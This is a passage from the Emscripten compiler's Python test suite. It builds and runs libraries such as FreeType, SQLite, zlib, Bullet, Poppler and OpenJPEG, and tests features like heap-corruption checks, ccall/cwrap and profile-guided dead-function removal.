#for opt in ['-aa-eval', '-adce', '-always-inline', '-argpromotion', '-basicaa', '-basiccg', '-block-placement', '-break-crit-edges', '-codegenprepare', '-constmerge', '-constprop', '-correlated-propagation', '-count-aa', '-dce', '-deadargelim', '-deadtypeelim', '-debug-aa', '-die', '-domfrontier', '-domtree', '-dse', '-extract-blocks', '-functionattrs', '-globaldce', '-globalopt', '-globalsmodref-aa', '-gvn', '-indvars', '-inline', '-insert-edge-profiling', '-insert-optimal-edge-profiling', '-instcombine', '-instcount', '-instnamer', '-internalize', '-intervals', '-ipconstprop', '-ipsccp', '-iv-users', '-jump-threading', '-lazy-value-info', '-lcssa', '-lda', '-libcall-aa', '-licm', '-lint', '-live-values', '-loop-deletion', '-loop-extract', '-loop-extract-single', '-loop-index-split', '-loop-reduce', '-loop-rotate', '-loop-unroll', '-loop-unswitch', '-loops', '-loopsimplify', '-loweratomic', '-lowerinvoke', '-lowersetjmp', '-lowerswitch', '-mem2reg', '-memcpyopt', '-memdep', '-mergefunc', '-mergereturn', '-module-debuginfo', '-no-aa', '-no-profile', '-partial-inliner', '-partialspecialization', '-pointertracking', '-postdomfrontier', '-postdomtree', '-preverify', '-prune-eh', '-reassociate', '-reg2mem', '-regions', '-scalar-evolution', '-scalarrepl', '-sccp', '-scev-aa', '-simplify-libcalls', '-simplify-libcalls-halfpowr', '-simplifycfg', '-sink', '-split-geps', '-sretpromotion', '-strip', '-strip-dead-debug-info', '-strip-dead-prototypes', '-strip-debug-declare', '-strip-nondebug', '-tailcallelim', '-tailduplicate', '-targetdata', '-tbaa']:
# LLVM_OPT_OPTS = [opt]
# try:
# self.do_run(path_from_root(['third_party']), '*d_demangle(char const*, int, unsigned int*)*', args=['_ZL10d_demanglePKciPj'], main_file='gcc_demangler.c')
# print opt, "ok"
# except:
# print opt, "FAIL"
def test_lua(self):
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.QUANTUM_SIZE == 1: return self.skip('TODO: make this work')
self.do_run('',
'hello lua world!\n17\n1\n2\n3\n4\n7',
args=['-e', '''print("hello lua world!");print(17);for x = 1,4 do print(x) end;print(10-3)'''],
libraries=self.get_library('lua', [os.path.join('src', 'lua'), os.path.join('src', 'liblua.a')], make=['make', 'generic'], configure=None),
includes=[path_from_root('tests', 'lua')],
output_nicerizer=lambda string, err: (string + err).replace('\n\n', '\n').replace('\n\n', '\n'))
def get_freetype(self):
Settings.DEAD_FUNCTIONS += ['_inflateEnd', '_inflate', '_inflateReset', '_inflateInit2_']
return self.get_library('freetype',
os.path.join('objs', '.libs', 'libfreetype.a'))
def test_freetype(self):
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.QUANTUM_SIZE == 1: return self.skip('TODO: Figure out and try to fix')
if Settings.ASM_JS and '-O2' not in self.emcc_args: return self.skip('mozilla bug 863867')
if Settings.CORRECT_SIGNS == 0: Settings.CORRECT_SIGNS = 1 # Not sure why, but needed
post = '''
def process(filename):
import tools.shared as shared
# Embed the font into the document
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createDataFile('/', 'font.ttf', %s, true, false);" % str(
map(ord, open(shared.path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), 'rb').read())
)
)
open(filename, 'w').write(src)
'''
# Not needed for js, but useful for debugging
shutil.copyfile(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), os.path.join(self.get_dir(), 'font.ttf'))
# Main
self.do_run(open(path_from_root('tests', 'freetype', 'main.c'), 'r').read(),
open(path_from_root('tests', 'freetype', 'ref.txt'), 'r').read(),
['font.ttf', 'test!', '150', '120', '25'],
libraries=self.get_freetype(),
includes=[path_from_root('tests', 'freetype', 'include')],
post_build=post)
#build_ll_hook=self.do_autodebug)
# github issue 324
print '[issue 324]'
self.do_run(open(path_from_root('tests', 'freetype', 'main_2.c'), 'r').read(),
open(path_from_root('tests', 'freetype', 'ref_2.txt'), 'r').read(),
['font.ttf', 'w', '32', '32', '25'],
libraries=self.get_freetype(),
includes=[path_from_root('tests', 'freetype', 'include')],
post_build=post)
print '[issue 324 case 2]'
self.do_run(open(path_from_root('tests', 'freetype', 'main_3.c'), 'r').read(),
open(path_from_root('tests', 'freetype', 'ref_3.txt'), 'r').read(),
['font.ttf', 'W', '32', '32', '0'],
libraries=self.get_freetype(),
includes=[path_from_root('tests', 'freetype', 'include')],
post_build=post)
print '[issue 324 case 3]'
self.do_run('',
open(path_from_root('tests', 'freetype', 'ref_4.txt'), 'r').read(),
['font.ttf', 'ea', '40', '32', '0'],
no_build=True)
def test_sqlite(self):
# gcc -O3 -I/home/alon/Dev/emscripten/tests/sqlite -ldl src.c
if self.emcc_args is None: return self.skip('Very slow without ta2, and we would also need to include dlmalloc manually without emcc')
if Settings.QUANTUM_SIZE == 1: return self.skip('TODO FIXME')
self.banned_js_engines = [NODE_JS] # OOM in older node
Settings.CORRECT_SIGNS = 1
Settings.CORRECT_OVERFLOWS = 0
Settings.CORRECT_ROUNDINGS = 0
if self.emcc_args is None: Settings.SAFE_HEAP = 0 # uses time.h to set random bytes, other stuff
Settings.DISABLE_EXCEPTION_CATCHING = 1
Settings.FAST_MEMORY = 4*1024*1024
Settings.EXPORTED_FUNCTIONS += ['_sqlite3_open', '_sqlite3_close', '_sqlite3_exec', '_sqlite3_free', '_callback']
if Settings.ASM_JS == 1 and '-g' in self.emcc_args:
print "disabling inlining" # without registerize (which -g disables), we generate huge amounts of code
Settings.INLINING_LIMIT = 50
self.do_run(r'''
#define SQLITE_DISABLE_LFS
#define LONGDOUBLE_TYPE double
#define SQLITE_INT64_TYPE long long int
#define SQLITE_THREADSAFE 0
''' + open(path_from_root('tests', 'sqlite', 'sqlite3.c'), 'r').read() +
open(path_from_root('tests', 'sqlite', 'benchmark.c'), 'r').read(),
open(path_from_root('tests', 'sqlite', 'benchmark.txt'), 'r').read(),
includes=[path_from_root('tests', 'sqlite')],
force_c=True)
def test_zlib(self):
if not Settings.USE_TYPED_ARRAYS == 2: return self.skip('works in general, but cached build will be optimized and fail, so disable this')
if Settings.ASM_JS:
self.banned_js_engines = [NODE_JS] # TODO investigate
if self.emcc_args is not None and '-O2' in self.emcc_args and 'ASM_JS=0' not in self.emcc_args: # without asm, closure minifies Math.imul badly
self.emcc_args += ['--closure', '1'] # Use closure here for some additional coverage
Settings.CORRECT_SIGNS = 1
self.do_run(open(path_from_root('tests', 'zlib', 'example.c'), 'r').read(),
open(path_from_root('tests', 'zlib', 'ref.txt'), 'r').read(),
libraries=self.get_library('zlib', os.path.join('libz.a'), make_args=['libz.a']),
includes=[path_from_root('tests', 'zlib')],
force_c=True)
def test_the_bullet(self): # Called thus so it runs late in the alphabetical cycle... it is long
if self.emcc_args is None: return self.skip('requires emcc')
if Building.LLVM_OPTS and self.emcc_args is None: Settings.SAFE_HEAP = 0 # Optimizations make it so we do not have debug info on the line we need to ignore (note: unreachable here, since emcc-less runs were skipped above)
Settings.DEAD_FUNCTIONS = ['__ZSt9terminatev']
# Note: this is also a good test of per-file and per-line changes (since we have multiple files, and correct specific lines)
if Settings.SAFE_HEAP:
# Ignore bitfield warnings
Settings.SAFE_HEAP = 3
Settings.SAFE_HEAP_LINES = ['btVoronoiSimplexSolver.h:40', 'btVoronoiSimplexSolver.h:41',
'btVoronoiSimplexSolver.h:42', 'btVoronoiSimplexSolver.h:43']
def test():
self.do_run(open(path_from_root('tests', 'bullet', 'Demos', 'HelloWorld', 'HelloWorld.cpp'), 'r').read(),
[open(path_from_root('tests', 'bullet', 'output.txt'), 'r').read(), # different roundings
open(path_from_root('tests', 'bullet', 'output2.txt'), 'r').read(),
open(path_from_root('tests', 'bullet', 'output3.txt'), 'r').read()],
libraries=self.get_library('bullet', [os.path.join('src', '.libs', 'libBulletDynamics.a'),
os.path.join('src', '.libs', 'libBulletCollision.a'),
os.path.join('src', '.libs', 'libLinearMath.a')],
configure_args=['--disable-demos','--disable-dependency-tracking']),
includes=[path_from_root('tests', 'bullet', 'src')])
test()
assert 'asm2g' in test_modes
if self.run_name == 'asm2g':
# Test forced alignment
print >> sys.stderr, 'testing FORCE_ALIGNED_MEMORY'
old = open('src.cpp.o.js').read()
Settings.FORCE_ALIGNED_MEMORY = 1
test()
new = open('src.cpp.o.js').read()
print len(old), len(new), old.count('tempBigInt'), new.count('tempBigInt')
assert len(old) > len(new)
assert old.count('tempBigInt') > new.count('tempBigInt')
def test_poppler(self):
if self.emcc_args is None: return self.skip('very slow, we only do this in emcc runs')
Settings.CORRECT_OVERFLOWS = 1
Settings.CORRECT_SIGNS = 1
Building.COMPILER_TEST_OPTS += [
'-I' + path_from_root('tests', 'freetype', 'include'),
'-I' + path_from_root('tests', 'poppler', 'include'),
]
Settings.INVOKE_RUN = 0 # We append code that does run() ourselves
# See post(), below
input_file = open(os.path.join(self.get_dir(), 'paper.pdf.js'), 'w')
input_file.write(str(map(ord, open(path_from_root('tests', 'poppler', 'paper.pdf'), 'rb').read())))
input_file.close()
post = '''
def process(filename):
# To avoid loading this large file to memory and altering it, we simply append to the end
src = open(filename, 'a')
src.write(
\'\'\'
FS.createDataFile('/', 'paper.pdf', eval(Module.read('paper.pdf.js')), true, false);
Module.callMain(Module.arguments);
Module.print("Data: " + JSON.stringify(FS.root.contents['filename-1.ppm'].contents.map(function(x) { return unSign(x, 8) })));
\'\'\'
)
src.close()
'''
#fontconfig = self.get_library('fontconfig', [os.path.join('src', '.libs', 'libfontconfig.a')]) # Used in file, but not needed, mostly
freetype = self.get_freetype()
poppler = self.get_library('poppler',
[os.path.join('utils', 'pdftoppm.o'),
os.path.join('utils', 'parseargs.o'),
os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init={ 'FONTCONFIG_CFLAGS': ' ', 'FONTCONFIG_LIBS': ' ' },
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--enable-shared=no'])
# Combine libraries
combined = os.path.join(self.get_dir(), 'poppler-combined.bc')
Building.link(poppler + freetype, combined)
self.do_ll_run(combined,
map(ord, open(path_from_root('tests', 'poppler', 'ref.ppm'), 'r').read()).__str__().replace(' ', ''),
args='-scale-to 512 paper.pdf filename'.split(' '),
post_build=post)
#, build_ll_hook=self.do_autodebug)
def test_openjpeg(self):
if self.emcc_args is None: return self.skip('needs libc for getopt')
Building.COMPILER_TEST_OPTS = filter(lambda x: x != '-g', Building.COMPILER_TEST_OPTS) # remove -g, so we have one test without it by default
if Settings.USE_TYPED_ARRAYS == 2:
Settings.CORRECT_SIGNS = 1
else:
Settings.CORRECT_SIGNS = 2
Settings.CORRECT_SIGNS_LINES = ["mqc.c:566", "mqc.c:317"]
post = '''
def process(filename):
import tools.shared as shared
original_j2k = shared.path_from_root('tests', 'openjpeg', 'syntensity_lobby_s.j2k')
src = open(filename, 'r').read().replace(
'// {{PRE_RUN_ADDITIONS}}',
"FS.createDataFile('/', 'image.j2k', %s, true, false);" % shared.line_splitter(str(
map(ord, open(original_j2k, 'rb').read())
))
).replace(
'// {{POST_RUN_ADDITIONS}}',
"Module.print('Data: ' + JSON.stringify(FS.analyzePath('image.raw').object.contents));"
)
open(filename, 'w').write(src)
'''
shutil.copy(path_from_root('tests', 'openjpeg', 'opj_config.h'), self.get_dir())
lib = self.get_library('openjpeg',
[os.path.sep.join('codec/CMakeFiles/j2k_to_image.dir/index.c.o'.split('/')),
os.path.sep.join('codec/CMakeFiles/j2k_to_image.dir/convert.c.o'.split('/')),
os.path.sep.join('codec/CMakeFiles/j2k_to_image.dir/__/common/color.c.o'.split('/')),
os.path.join('bin', 'libopenjpeg.so.1.4.0')],
configure=['cmake', '.'],
#configure_args=['--enable-tiff=no', '--enable-jp3d=no', '--enable-png=no'],
make_args=[]) # no -j 2, since parallel builds can fail
# We use doubles in JS, so we get slightly different values than native code. So we
# check our output by comparing the average pixel difference
def image_compare(output, err):
# Get the image generated by JS, from the JSON.stringify'd array
m = re.search('\[[\d, -]*\]', output)
try:
js_data = eval(m.group(0))
except AttributeError:
print 'Failed to find proper image output in: ' + output
raise
js_data = map(lambda x: x if x >= 0 else 256+x, js_data) # Our output may be signed, so unsign it
# Get the correct output
true_data = open(path_from_root('tests', 'openjpeg', 'syntensity_lobby_s.raw'), 'rb').read()
# Compare them
assert len(js_data) == len(true_data)
num = len(js_data)
diff_total = js_total = true_total = 0
for i in range(num):
js_total += js_data[i]
true_total += ord(true_data[i])
diff_total += abs(js_data[i] - ord(true_data[i]))
js_mean = js_total/float(num)
true_mean = true_total/float(num)
diff_mean = diff_total/float(num)
image_mean = 83.265
#print '[image stats:', js_mean, image_mean, true_mean, diff_mean, num, ']'
assert abs(js_mean - image_mean) < 0.01
assert abs(true_mean - image_mean) < 0.01
assert diff_mean < 0.01
return output
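# (Worked example of the metric above: with num pixels, a JS pixel of 250
# against a reference pixel of 252 adds 2/num to diff_mean; 83.265 is the
# expected mean brightness of both images, so the three asserts together
# bound the per-pixel drift introduced by doing the math in JS doubles.)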
self.emcc_args += ['--minify', '0'] # to compare the versions
def do_test():
self.do_run(open(path_from_root('tests', 'openjpeg', 'codec', 'j2k_to_image.c'), 'r').read(),
'Successfully generated', # The real test for valid output is in image_compare
'-i image.j2k -o image.raw'.split(' '),
libraries=lib,
includes=[path_from_root('tests', 'openjpeg', 'libopenjpeg'),
path_from_root('tests', 'openjpeg', 'codec'),
path_from_root('tests', 'openjpeg', 'common'),
os.path.join(self.get_build_dir(), 'openjpeg')],
force_c=True,
post_build=post,
output_nicerizer=image_compare)#, build_ll_hook=self.do_autodebug)
do_test()
# some test coverage for EMCC_DEBUG 1 and 2
if self.emcc_args and '-O2' in self.emcc_args and 'EMCC_DEBUG' not in os.environ:
shutil.copyfile('src.c.o.js', 'release.js')
try:
os.environ['EMCC_DEBUG'] = '1'
print 'EMCC_DEBUG=1'
do_test()
shutil.copyfile('src.c.o.js', 'debug1.js')
os.environ['EMCC_DEBUG'] = '2'
print 'EMCC_DEBUG=2'
do_test()
shutil.copyfile('src.c.o.js', 'debug2.js')
finally:
del os.environ['EMCC_DEBUG']
for debug in [1,2]:
def clean(text):
# collapse runs of blank lines (each pass halves consecutive blank lines) and squash empty bodies
return text.replace('\n\n', '\n').replace('\n\n', '\n').replace('\n\n', '\n').replace('\n\n', '\n').replace('\n\n', '\n').replace('{\n}', '{}')
self.assertIdentical(clean(open('release.js').read()), clean(open('debug%d.js' % debug).read())) # EMCC_DEBUG=1 mode must not generate different code!
print >> sys.stderr, 'debug check %d passed too' % debug
try:
os.environ['EMCC_FORCE_STDLIBS'] = '1'
print 'EMCC_FORCE_STDLIBS'
do_test()
finally:
del os.environ['EMCC_FORCE_STDLIBS']
print >> sys.stderr, 'EMCC_FORCE_STDLIBS ok'
try_delete(CANONICAL_TEMP_DIR)
else:
print >> sys.stderr, 'not doing debug check'
def test_python(self):
if self.emcc_args is None: return self.skip('requires emcc')
if Settings.QUANTUM_SIZE == 1: return self.skip('TODO: make this work')
if not self.is_le32(): return self.skip('fails on non-le32') # FIXME
#Settings.EXPORTED_FUNCTIONS += ['_PyRun_SimpleStringFlags'] # for the demo
if self.is_le32():
bitcode = path_from_root('tests', 'python', 'python.le32.bc')
else:
bitcode = path_from_root('tests', 'python', 'python.small.bc')
self.do_ll_run(bitcode,
'hello python world!\n[0, 2, 4, 6]\n5\n22\n5.470000',
args=['-S', '-c' '''print "hello python world!"; print [x*2 for x in range(4)]; t=2; print 10-3-t; print (lambda x: x*2)(11); print '%f' % 5.47''']) # note: the adjacent string literals concatenate, so this is a single '-c<code>' argument
def test_lifetime(self):
if self.emcc_args is None: return self.skip('test relies on emcc opts')
self.do_ll_run(path_from_root('tests', 'lifetime.ll'), 'hello, world!\n')
if '-O1' in self.emcc_args or '-O2' in self.emcc_args:
assert 'a18' not in open(os.path.join(self.get_dir(), 'src.cpp.o.js')).read(), 'lifetime stuff and their vars must be culled'
# Test cases in separate files. Note that these files may contain invalid .ll!
# They are only valid enough for us to read for test purposes, not for llvm-as
# to process.
def test_cases(self):
if Building.LLVM_OPTS: return self.skip("Our code is not exactly 'normal' llvm assembly")
try:
os.environ['EMCC_LEAVE_INPUTS_RAW'] = '1'
Settings.CHECK_OVERFLOWS = 0
for name in glob.glob(path_from_root('tests', 'cases', '*.ll')):
shortname = name.replace('.ll', '')
if '' not in shortname: continue # development hook for filtering cases by name; the empty string matches everything, so nothing is skipped by default
if '_ta2' in shortname and not Settings.USE_TYPED_ARRAYS == 2:
print self.skip('case "%s" only relevant for ta2' % shortname)
continue
if '_noasm' in shortname and Settings.ASM_JS:
print self.skip('case "%s" not relevant for asm.js' % shortname)
continue
print >> sys.stderr, "Testing case '%s'..." % shortname
output_file = path_from_root('tests', 'cases', shortname + '.txt')
if Settings.QUANTUM_SIZE == 1:
q1_output_file = path_from_root('tests', 'cases', shortname + '_q1.txt')
if os.path.exists(q1_output_file):
output_file = q1_output_file
if os.path.exists(output_file):
output = open(output_file, 'r').read()
else:
output = 'hello, world!'
if output.rstrip() != 'skip':
self.do_ll_run(path_from_root('tests', 'cases', name), output)
# Optional source checking, a python script that gets a global generated with the source
src_checker = path_from_root('tests', 'cases', shortname + '.py')
if os.path.exists(src_checker):
generated = open('src.cpp.o.js').read()
exec(open(src_checker).read())
finally:
del os.environ['EMCC_LEAVE_INPUTS_RAW']
def test_fuzz(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('needs ta2')
Building.COMPILER_TEST_OPTS += ['-I' + path_from_root('tests', 'fuzz')]
def run_all(x):
print x
for name in glob.glob(path_from_root('tests', 'fuzz', '*.c')):
print name
self.do_run(open(path_from_root('tests', 'fuzz', name)).read(),
open(path_from_root('tests', 'fuzz', name + '.txt')).read(), force_c=True)
run_all('normal')
self.emcc_args += ['--llvm-lto', '1']
run_all('lto')
# Autodebug the code
def do_autodebug(self, filename):
output = Popen([PYTHON, AUTODEBUGGER, filename+'.o.ll', filename+'.o.ll.ll'], stdout=PIPE, stderr=self.stderr_redirect).communicate()[0]
assert 'Success.' in output, output
self.prep_ll_run(filename, filename+'.o.ll.ll', force_recompile=True) # rebuild .bc # TODO: use code in do_autodebug_post for this
# Autodebug the code, after LLVM opts. Will only work once!
def do_autodebug_post(self, filename):
if not hasattr(self, 'post'):
print 'Asking for post re-call'
self.post = True
return True
print 'Autodebugging during post time'
delattr(self, 'post')
output = Popen([PYTHON, AUTODEBUGGER, filename+'.o.ll', filename+'.o.ll.ll'], stdout=PIPE, stderr=self.stderr_redirect).communicate()[0]
assert 'Success.' in output, output
shutil.copyfile(filename + '.o.ll.ll', filename + '.o.ll')
Building.llvm_as(filename)
Building.llvm_dis(filename)
def test_autodebug(self):
if Building.LLVM_OPTS: return self.skip('LLVM opts mess us up')
Building.COMPILER_TEST_OPTS += ['--llvm-opts', '0']
# Run a test that should work, generating some code
self.test_structs()
filename = os.path.join(self.get_dir(), 'src.cpp')
self.do_autodebug(filename)
# Compare to each other, and to expected output
self.do_ll_run(path_from_root('tests', filename+'.o.ll.ll'), '''AD:-1,1''')
assert open('stdout').read().startswith('AD:-1'), 'We must note when we enter functions'
# Test using build_ll_hook
src = '''
#include <stdio.h>
char cache[256], *next = cache;
int main()
{
cache[10] = 25;
next[20] = 51;
int x = cache[10];
double y = 11.52;
printf("*%d,%d,%.2f*\\n", x, cache[20], y);
return 0;
}
'''
self.do_run(src, '''AD:-1,1''', build_ll_hook=self.do_autodebug)
def test_corruption(self):
if Settings.ASM_JS: return self.skip('cannot use corruption checks in asm')
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('needs ta2 for actual test')
Settings.CORRUPTION_CHECK = 1
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv) {
int size = 1024*argc;
char *buffer = (char*)malloc(size);
#if CORRUPT
memset(buffer, argc, size+15);
#else
memset(buffer, argc, size);
#endif
for (int x = 0; x < size; x += argc*3) buffer[x] = x/3;
int ret = 0;
for (int x = 0; x < size; x++) ret += buffer[x];
free(buffer);
printf("All ok, %d\n", ret);
}
'''
for corrupt in [1]:
self.do_run(src.replace('CORRUPT', str(corrupt)), 'Heap corruption detected!' if corrupt else 'All ok, 4209')
def test_corruption_2(self):
if Settings.ASM_JS: return self.skip('cannot use corruption checks in asm')
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('needs ta2 for actual test')
Settings.SAFE_HEAP = 1
Settings.CORRUPTION_CHECK = 1
# test for free(0), malloc(0), etc.
src = r'''
#include <iostream>
#include <fstream>
#include <stdlib.h>
#include <stdio.h>
void bye() {
printf("all ok\n");
}
int main() {
atexit(bye);
std::string testPath = "/Script/WA-KA.txt";
std::fstream str(testPath.c_str(), std::ios::in | std::ios::binary);
if (str.is_open())
{
std::cout << "open!" << std::endl;
} else {
std::cout << "missing!" << std::endl;
}
return 1;
}
'''
self.do_run(src, 'missing!\nall ok\n')
def test_corruption_3(self):
if Settings.ASM_JS: return self.skip('cannot use corruption checks in asm')
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('needs ta2 for actual test')
Settings.CORRUPTION_CHECK = 1
# realloc
src = r'''
#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
void bye() {
printf("all ok\n");
}
int main(int argc, char **argv) {
atexit(bye);
char *buffer = (char*)malloc(100);
for (int i = 0; i < 100; i++) buffer[i] = (i*i)%256;
buffer = (char*)realloc(buffer, argc + 50);
for (int i = 0; i < argc + 50; i++) {
//printf("%d : %d : %d : %d\n", i, (int)(buffer + i), buffer[i], (char)((i*i)%256));
assert(buffer[i] == (char)((i*i)%256));
}
return 1;
}
'''
self.do_run(src, 'all ok\n')
### Integration tests
def test_ccall(self):
if self.emcc_args is not None and '-O2' in self.emcc_args:
self.emcc_args += ['--closure', '1'] # Use closure here, to test we export things right
src = r'''
#include <stdio.h>
extern "C" {
int get_int() { return 5; }
float get_float() { return 3.14; }
char * get_string() { return "hello world"; }
void print_int(int x) { printf("%d\n", x); }
void print_float(float x) { printf("%.2f\n", x); }
void print_string(char *x) { printf("%s\n", x); }
int multi(int x, float y, int z, char *str) { if (x) puts(str); return (x+y)*z; }
int * pointer(int *in) { printf("%d\n", *in); static int ret = 21; return &ret; }
}
int main(int argc, char **argv) {
// keep them alive
if (argc == 10) return get_int();
if (argc == 11) return get_float();
if (argc == 12) return get_string()[0];
if (argc == 13) print_int(argv[0][0]);
if (argc == 14) print_float(argv[0][0]);
if (argc == 15) print_string(argv[0]);
if (argc == 16) pointer((int*)argv[0]);
if (argc % 17 == 12) return multi(argc, float(argc)/2, argc+1, argv[0]);
return 0;
}
'''
post = '''
def process(filename):
src = \'\'\'
var Module = {
'postRun': function() {
Module.print('*');
var ret;
ret = Module['ccall']('get_int', 'number'); Module.print([typeof ret, ret]);
ret = ccall('get_float', 'number'); Module.print([typeof ret, ret.toFixed(2)]);
ret = ccall('get_string', 'string'); Module.print([typeof ret, ret]);
ret = ccall('print_int', null, ['number'], [12]); Module.print(typeof ret);
ret = ccall('print_float', null, ['number'], [14.56]); Module.print(typeof ret);
ret = ccall('print_string', null, ['string'], ["cheez"]); Module.print(typeof ret);
ret = ccall('print_string', null, ['array'], [[97, 114, 114, 45, 97, 121, 0]]); Module.print(typeof ret);
ret = ccall('multi', 'number', ['number', 'number', 'number', 'string'], [2, 1.4, 3, 'more']); Module.print([typeof ret, ret]);
var p = ccall('malloc', 'pointer', ['number'], [4]);
setValue(p, 650, 'i32');
ret = ccall('pointer', 'pointer', ['pointer'], [p]); Module.print([typeof ret, getValue(ret, 'i32')]);
Module.print('*');
// part 2: cwrap
var multi = Module['cwrap']('multi', 'number', ['number', 'number', 'number', 'string']);
Module.print(multi(2, 1.4, 3, 'atr'));
Module.print(multi(8, 5.4, 4, 'bret'));
Module.print('*');
// part 3: avoid stack explosion
for (var i = 0; i < TOTAL_STACK/60; i++) {
ccall('multi', 'number', ['number', 'number', 'number', 'string'], [0, 0, 0, '123456789012345678901234567890123456789012345678901234567890']);
}
Module.print('stack is ok.');
}
};
\'\'\' + open(filename, 'r').read()
open(filename, 'w').write(src)
'''
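# The two JS entry points exercised by the script above, in brief:
# ccall(name, returnType, argTypes, args) does a one-shot call with automatic
# marshalling of 'string' and 'array' arguments, while
# cwrap(name, returnType, argTypes) returns a reusable JS function wrapper.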
Settings.EXPORTED_FUNCTIONS += ['_get_int', '_get_float', '_get_string', '_print_int', '_print_float', '_print_string', '_multi', '_pointer', '_malloc']
self.do_run(src, '*\nnumber,5\nnumber,3.14\nstring,hello world\n12\nundefined\n14.56\nundefined\ncheez\nundefined\narr-ay\nundefined\nmore\nnumber,10\n650\nnumber,21\n*\natr\n10\nbret\n53\n*\nstack is ok.\n', post_build=post)
def test_pgo(self):
if Settings.ASM_JS: return self.skip('PGO does not work in asm mode')
def run_all(name, src):
print name
def test(expected, args=[], no_build=False):
self.do_run(src, expected, args=args, no_build=no_build)
return open(self.in_dir('src.cpp.o.js')).read()
# Sanity check that it works and the dead function is emitted
js = test('*9*')
assert 'function _unused(' in js
# Run with PGO, see that unused is true to its name
Settings.PGO = 1
test("*9*\n-s DEAD_FUNCTIONS='[\"_unused\"]'")
Settings.PGO = 0
# Kill off the dead function, still works and it is not emitted
Settings.DEAD_FUNCTIONS = ['_unused']
js = test('*9*')
assert 'function _unused($' not in js # no compiled code
assert 'function _unused(' in js # lib-generated stub
Settings.DEAD_FUNCTIONS = []
# Run the same code with argc that uses the dead function, see abort
test('missing function: unused', args=['a', 'b'], no_build=True)
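# To summarize the flow exercised above: a PGO=1 build instruments the
# program and prints a suggested -s DEAD_FUNCTIONS='[...]' list at runtime;
# feeding that list back into a normal build removes the compiled bodies,
# leaving only lib-generated stubs that abort with 'missing function: ...'
# if the supposedly-dead code is ever reached.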
# Normal stuff
run_all('normal', r'''
#include <stdio.h>
extern "C" {
int used(int x) {
if (x == 0) return -1;
return used(x/3) + used(x/17) + x%5;
}
int unused(int x) {
if (x == 0) return -1;
return unused(x/4) + unused(x/23) + x%7;
}
}
int main(int argc, char **argv) {
printf("*%d*\n", argc == 3 ? unused(argv[0][0] + 1024) : used(argc + 1555));
return 0;
}
''')
# Call by function pointer
run_all('function pointers', r'''
#include <stdio.h>
extern "C" {
int used(int x) {
if (x == 0) return -1;
return used(x/3) + used(x/17) + x%5;
}
int unused(int x) {
if (x == 0) return -1;
return unused(x/4) + unused(x/23) + x%7;
}
}
typedef int (*ii)(int);
int main(int argc, char **argv) {
ii pointers[256];
for (int i = 0; i < 256; i++) {
pointers[i] = (i == 3) ? unused : used;
}
printf("*%d*\n", pointers[argc](argc + 1555));
return 0;
}
''')
def test_asm_pgo(self):
if not Settings.ASM_JS: return self.skip('this is a test for PGO for asm (NB: not *in* asm)')
src = open(path_from_root('tests', 'hello_libcxx.cpp')).read()
output = 'hello, world!'
self.do_run(src, output)
shutil.move(self.in_dir('src.cpp.o.js'), self.in_dir('normal.js'))
Settings.ASM_JS = 0
Settings.PGO = 1
self.do_run(src, output)
Settings.ASM_JS = 1
Settings.PGO = 0
shutil.move(self.in_dir('src.cpp.o.js'), self.in_dir('pgo.js'))
pgo_output = run_js(self.in_dir('pgo.js')).split('\n')[1]
open('pgo_data.rsp', 'w').write(pgo_output)
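# '@file' is response-file syntax: both on the emcc command line
# (emcc @pgo_data.rsp) and inside a -s setting (DEAD_FUNCTIONS=@file),
# the file's contents are substituted for the reference, as the three
# variants below check.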
# with response file
self.emcc_args += ['@pgo_data.rsp']
self.do_run(src, output)
self.emcc_args.pop()
shutil.move(self.in_dir('src.cpp.o.js'), self.in_dir('pgoed.js'))
before = len(open('normal.js').read())
after = len(open('pgoed.js').read())
assert after < 0.90 * before, [before, after] # expect a size reduction
# with response in settings element itself
open('dead_funcs', 'w').write(pgo_output[pgo_output.find('['):-1])
self.emcc_args += ['-s', 'DEAD_FUNCTIONS=@' + self.in_dir('dead_funcs')]
self.do_run(src, output)
self.emcc_args.pop()
self.emcc_args.pop()
shutil.move(self.in_dir('src.cpp.o.js'), self.in_dir('pgoed2.js'))
assert open('pgoed.js').read() == open('pgoed2.js').read()
# with relative response in settings element itself
open('dead_funcs', 'w').write(pgo_output[pgo_output.find('['):-1])
self.emcc_args += ['-s', 'DEAD_FUNCTIONS=@dead_funcs']
self.do_run(src, output)
self.emcc_args.pop()
self.emcc_args.pop()
shutil.move(self.in_dir('src.cpp.o.js'), self.in_dir('pgoed2.js'))
assert open('pgoed.js').read() == open('pgoed2.js').read()
def test_exported_response(self):
if self.emcc_args is None: return self.skip('requires emcc')
src = r'''
#include <stdio.h>
#include <stdlib.h>
extern "C" {
int other_function() { return 5; }
}
int main() {
printf("waka!\n");
return 0;
}
'''
open('exps', 'w').write('["_main","_other_function"]')
self.emcc_args += ['-s', 'EXPORTED_FUNCTIONS=@exps']
self.do_run(src, '''waka!''')
assert 'other_function' in open('src.cpp.o.js').read()
def test_add_function(self):
if self.emcc_args is None: return self.skip('requires emcc')
Settings.INVOKE_RUN = 0
Settings.RESERVED_FUNCTION_POINTERS = 1
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char **argv) {
int fp = atoi(argv[1]);
printf("fp: %d\n", fp);
void (*f)(int) = reinterpret_cast<void (*)(int)>(fp);
f(7);
return 0;
}
'''
open(os.path.join(self.get_dir(), 'post.js'), 'w').write('''
var newFuncPtr = Runtime.addFunction(function(num) {
Module.print('Hello ' + num + ' from JS!');
});
Module.callMain([newFuncPtr.toString()]);
''')
self.emcc_args += ['--post-js', 'post.js']
self.do_run(src, '''Hello 7 from JS!''')
if Settings.ASM_JS:
Settings.RESERVED_FUNCTION_POINTERS = 0
self.do_run(src, '''Finished up all reserved function pointers. Use a higher value for RESERVED_FUNCTION_POINTERS.''')
